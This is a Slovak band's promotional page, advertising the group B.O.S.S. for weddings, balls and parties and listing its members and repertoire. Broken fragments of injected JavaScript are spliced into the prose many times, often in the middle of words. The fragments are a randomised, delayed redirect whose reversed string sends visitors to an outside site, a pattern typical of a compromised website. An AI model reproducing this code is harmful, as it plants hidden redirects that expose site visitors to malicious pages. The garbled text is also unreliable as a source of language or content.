Plesy, zábavy, stužkové, svadby, rodinné oslavy. Pri týchdom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}todom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);} akciách nikdy nesmie chýbať hudba a dobrá zábava. Kapela B.O.S.S. je pre vás ako stvorená. Muzika, kdom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}todom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}rá nie len zahrá do tanca, ale taktiež Vás aj naladí na príjemnú atmosféru plnú zábavy a pohody. Naša kapela sa skladá z troch členov a dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}todom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}:

Ferdindom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}and Trško        - Feri         klávesy, trubka, harmonika, spev

Martin Trško             - Maťo       klávesy, akordeón, spev

Michaela Baláková     - Miška      spev, tamburína, bicie

Zahráme vám piesne z rôznych žánrov, vo viacerých jazykoch: rock, pop, funk, oldies piesne, najznámejšie české i slovenské skladby a repete. Samozrejme myslíme aj na našu staršiu generáciu. Ľudovky zo Slovenska, Čiech a Moravy v doprovode akordeónu, trubky a ozembuchu či bicie.

K dobrej atmosfére nesmie chýbať aj perfektné osvetlenie a výborný zvuk. B.O.S.S. disponuje so špičkovou zvukovou aparatúrou od svedom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}todom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}vých výrobcov a modernou svetelnou technikou.

Veríme, že v našej prídom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}todom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}mnosti si príde na svoje každá generácia. Kapela B.O.S.S. je pre Vás vždy len v dobrej nálade a s veľkým úsmevom. Predom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}todom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);} neváhajte ani minútu a poďte sa snami zabávať a smiať.